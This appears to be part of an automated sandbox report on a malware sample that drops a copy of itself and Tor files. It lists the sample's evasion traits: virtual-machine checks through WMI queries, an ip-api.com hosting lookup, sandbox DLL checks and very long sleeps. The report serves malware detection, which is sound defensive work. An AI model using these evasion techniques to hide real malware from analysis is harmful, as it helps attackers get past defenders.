Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: 00000000.00000002.2068698381.00000000025CB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: yt7dW9nyJK.exe PID: 5576, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ffmaba.exe PID: 7784, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ffmaba.exe PID: 5624, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ffmaba.exe PID: 2300, type: MEMORYSTR

Check if machine is in data center or colocation facility

Source: global traffic

HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)

Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE DriveType = 3

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Binary or memory string: SBIEDLL.DLL

Allocates memory with a write watch (potentially for evading sandboxes)

Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Memory allocated: AF0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Memory allocated: 2590000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Memory allocated: 2490000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Memory allocated: 57F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Memory allocated: 67F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Memory allocated: 6A20000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Memory allocated: 7A20000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Memory allocated: 2A90000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Memory allocated: 2BD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Memory allocated: 4BD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Memory allocated: 2550000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Memory allocated: 27D0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Memory allocated: 2550000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Memory allocated: 5A80000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Memory allocated: 6A80000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Memory allocated: 5A80000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Memory allocated: 2D80000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Memory allocated: 2D80000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Memory allocated: 4D80000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Memory allocated: 6180000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Memory allocated: 7180000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Memory allocated: 73C0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Memory allocated: 83C0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Memory allocated: 9EA0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Memory allocated: AEA0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Memory allocated: 6930000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Memory allocated: 1070000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Memory allocated: 2B90000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Memory allocated: 1070000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Memory allocated: 5E00000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Memory allocated: 6E00000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Memory allocated: 5E00000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Memory allocated: 2DC0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Memory allocated: 2EC0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Memory allocated: 2DC0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Memory allocated: 6220000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Memory allocated: 7220000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Memory allocated: 6220000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Memory allocated: 2410000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Memory allocated: 25F0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Memory allocated: 45F0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Memory allocated: 5940000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Memory allocated: 6940000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Memory allocated: 5940000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Memory allocated: 11D0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Memory allocated: 2E60000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Memory allocated: 2C40000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Memory allocated: 6120000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Memory allocated: 7120000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Memory allocated: 6120000 memory reserve \| memory write watch

Contains long sleeps (>= 3 min)

Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 599891
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 599782
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 599657
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 599532
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 599422
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 599313
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 599188
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 599063
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 598938
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 598813
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 598703
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 598594
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 598469
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 598360
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 598235
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 598110
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 597985
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 597860
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 597735
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 597610
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 597485
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 597360
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 597235
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 597110
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 596985
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 596860
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 596735
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 596610
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 596485
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 596360
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 596235
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 596110
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 595985
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 595860
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 595735
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 595610
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 595485
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 595360
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 595235
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 595110
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 594985
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 594860
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 594735
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 594610
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 594485
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 594360
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 594235
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 594096
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 593969
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6893	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2756	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Window / User API: threadDelayed 6850	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Window / User API: threadDelayed 2982	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6689	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3097	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6101	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3646	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7889
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Window / User API: threadDelayed 6187
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Window / User API: threadDelayed 3589
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 9158
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7736
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1950
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8662
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 668
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 9321
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 9532

Found dropped PE file which has not been started or loaded

Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\77rh3rhsc7\tor\libevent_extra-2-1-7.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\77rh3rhsc7\tor\libevent_core-2-1-7.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-gencert.exe	Jump to dropped file

Found large amount of non-executed APIs

Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe

API coverage: 0.2 %

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\Desktop\yt7dW9nyJK.exe TID: 6160	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
